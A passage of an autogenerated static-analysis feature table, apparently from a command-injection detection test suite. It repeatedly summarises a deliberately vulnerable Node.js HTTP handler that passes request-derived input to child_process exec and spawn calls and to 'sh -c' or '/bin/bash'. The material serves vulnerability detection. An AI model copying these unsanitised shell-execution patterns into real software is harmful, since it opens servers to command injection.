autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:18:39:30 | [ flag, cmd ] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:20:39:23 | flag | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:12 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:12 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:12 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:12 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:12 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args = [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args = [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args = [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args = [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:9:41:17 | args = [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:16:41:17 | [] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:16:41:17 | [] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:16:41:17 | [] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:16:41:17 | [] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:41:16:41:17 | [] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:11 | args[0] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:11 | args[0] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:11 | args[0] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:11 | args[0] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:11 | args[0] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:18 | args[0] = "-c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:18 | args[0] = "-c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:18 | args[0] = "-c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:18 | args[0] = "-c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:5:42:18 | args[0] = "-c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:10:42:10 | 0 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:10:42:10 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:10:42:10 | 0 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:10:42:10 | 0 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:10:42:10 | 0 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | assignedToPropName | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:42:15:42:18 | "-c" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:8 | args | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:8 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:8 | args | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:8 | args | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:8 | args | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:11 | args[1] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:11 | args[1] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:11 | args[1] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:11 | args[1] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:11 | args[1] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:17 | args[1] = cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:17 | args[1] = cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:17 | args[1] = cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:17 | args[1] = cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:5:43:17 | args[1] = cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:10:43:10 | 1 | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:10:43:10 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:10:43:10 | 1 | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:10:43:10 | 1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:10:43:10 | 1 | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | assignedToPropName | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:43:15:43:17 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| 